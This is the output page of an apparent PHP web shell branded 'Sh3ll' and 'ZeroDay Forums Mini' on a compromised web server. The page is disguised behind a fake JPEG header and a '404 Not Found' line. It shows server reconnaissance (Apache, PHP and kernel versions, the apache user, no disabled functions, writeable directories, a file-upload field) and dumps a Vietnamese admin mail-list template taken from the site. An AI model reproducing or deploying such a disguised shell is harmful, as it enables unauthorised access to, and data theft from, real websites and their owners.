����JFIF��� ( %"1"%)+...383,7(-.- 404 Not Found
Sh3ll
OdayForums


Server : Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.4.20
System : Linux st2.domain.com 3.10.0-1127.10.1.el7.x86_64 #1 SMP Wed Jun 3 14:28:03 UTC 2020 x86_64
User : apache ( 48)
PHP Version : 7.4.20
Disable Function : NONE
Directory :  /var/www/html/thietkewebvumi.com/admin_new/skin/admin/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /var/www/html/thietkewebvumi.com/admin_new/skin/admin/maillist.tpl
<h4 class="alert_info"><form action="index.php?act=maillist" method="post">
    <input type="text" name="fkeyword" value="" />
    <input type="submit" name="submita" value="Tìm kiếm" />
</form></h4>
{if $status == 'del_success'}
<h4 class="alert_success">Xóa email thành công</h4>
{/if}
{if $status == 'add_success'}
<h4 class="alert_success">Thêm email thành công</h4>
{/if}
{if $status == 'edit_success'}
<h4 class="alert_success">Sửa email thành công</h4>
{/if}
{if $section == 'list'}
    <script type="text/javascript">
        function get_mid(type){
            switch(type){
                case 'del':
                    if(confirm('Bạn có chắc muốn xóa?')){
                        $('#type').attr('value','del');
                        $('#form1').submit();
                        return false;
                    }
                    break;
                default:
                    $('#type').attr('value',type);
                    $('#form1').submit();
                    return false;
                    break;
            }
        }
    </script>
<article class="module width_full">
    <header><h3 class="tabs_involved"><a href="javascript:void(0);" onclick="get_mid();">Xóa</a> | <a href="javascript:void(0);" onclick="get_mid('send_mail');">Gửi email</a> | <a href="index.php?act=maillist&code=post">Thêm mới</a></h3></header>
    <input type="checkbox" name="all" id="checkall" /> Check all


    <div class="tab_container">

        <form action="index.php" method="post" name="post" id="form1">
            <input type="hidden" name="act" value="maillist">
        <div id="tab1" class="tab_content">
            <a name="maillist"></a>
            <table class="tablesorter" cellspacing="0">
                <thead>
                <tr>
                    <th> </th>
                    <th>Email</th>
                    <th>Ngày</th>
                    <th>Actions</th>
                </tr>
                </thead>
                {if $list}
                    {foreach from=$list key=k item=maillist}
                <tr>
                    <td><input type="checkbox" value="{$maillist.id}" name="mid_for_del[]"></td>
                    <td><a href="index.php?act=maillist&code=post&id={$maillist.id}" target="_blank">{$maillist.email}</a></td>
                    <td>{$maillist.joined}</td>
                    <td><a href="index.php?act=maillist&code=post&id={$maillist.id}" target="_blank"><img src="skin/{$skin_folder_admin}/images/icn_edit.png" title="Edit"></a> <a href="index.php?act=maillist&code=del&id={$maillist.id}" onclick="return confirm('Bạn có chắc muốn xóa?')"><img src="skin/{$skin_folder_admin}/images/icn_trash.png" title="Trash"></a></td>
                </tr>
                    {/foreach}
                {/if}
                <tr>
                    <td colspan="4">
                        <div align="center">{$nav|html_entity_decode}</div>
                    </td>
                </tr>
                <tr>
                    <td colspan="4">
                        <fieldset>
                            <label>Tiêu đề</label>
                            <input type="text" value="" name="subject" />
                        </fieldset>
                        <div class="module_content">
                            <h3>Nội dung email:</h3>
                            <p>{$content}</p>
                        </div>
                    </td>
                </tr>
            </table>
        </div>
            <footer>
                <div class="submit_link">
                    <input type="button" name="bsubmit" value=" Gửi email " onclick="get_mid('send_mail');"/>
                </div>
            </footer>
        </form>

    </div><!-- end of .tab_container -->

</article><!-- end of content manager article -->
    {literal}
        <script type="text/javascript">
            $('#checkall').click(function(){
                if($("#checkall").is(':checked')){
                    $('input:checkbox').attr('checked','checked');
                }else{
                    $('input:checkbox').removeAttr('checked');
                    location.reload();
                }
            });
        </script>
    {/literal}
{/if}


{if $section == 'post'}
<article class="module width_full">
    <header><h3>Quản lý maillist</h3></header>
 <form name="post" id="post" action="" method="post" enctype="multipart/form-data">
    <div class="module_content">


        <fieldset>
            <label>Tiêu đề</label>
            <input type="text" value="{$post.title|html_entity_decode}" name="title" />
        </fieldset>
        {if $info.showen == 1}
            <fieldset>
                <label>Tiêu đề tiếng Anh</label>
                <input type="text" value="{$post.etitle|html_entity_decode}" name="etitle" />
            </fieldset>
        {/if}
        <fieldset>
            <label>Mô tả</label>
            <textarea rows="10" name="des">{$post.des}</textarea>
        </fieldset>
        {if $info.showen == 1}
            <fieldset>
                <label>Mô tả tiếng Anh</label>
                <textarea rows="10" name="edes">{$post.edes}</textarea>
            </fieldset>
        {/if}
        <fieldset>
            <label>Hình ảnh</label>
            <input type="file" name="image1" /> <img src="../upload/maillist/thumb_{$post.img}" width="50" />
        </fieldset>

        <fieldset>
            <label>URL</label>
            <input type="text" name="url" value="{$post.url}" />

        </fieldset>

        <fieldset>
            <label>Target</label>
            <select name="target" style="width: 50%">
                <option value="_blank" {if $post.target=='_blank'}selected{/if}>-Mở tab mới-</option>
                <option value="_parent" {if $post.target=='_parent'}selected{/if}>-Không mở tab mới-</option>
            </select>
        </fieldset>

        <fieldset>
            <label>Loại banner</label>
            <select name="type">
                <option value="main_banner" {if $post.type=='main_banner'}selected{/if}>Main banner</option>
                <option value="partner" {if $post.type=='partner'}selected{/if}>Partner</option>
            </select>

        </fieldset>



    </div>
    <footer>
        <div class="submit_link">
            <input type="hidden" name="id" value="{$post.id}" />
            <input type="submit" name="bsubmit" value=" Lưu " />


        </div>
    </footer>

  </form>
</article><!-- end of post new article -->

{/if}


ZeroDay Forums Mini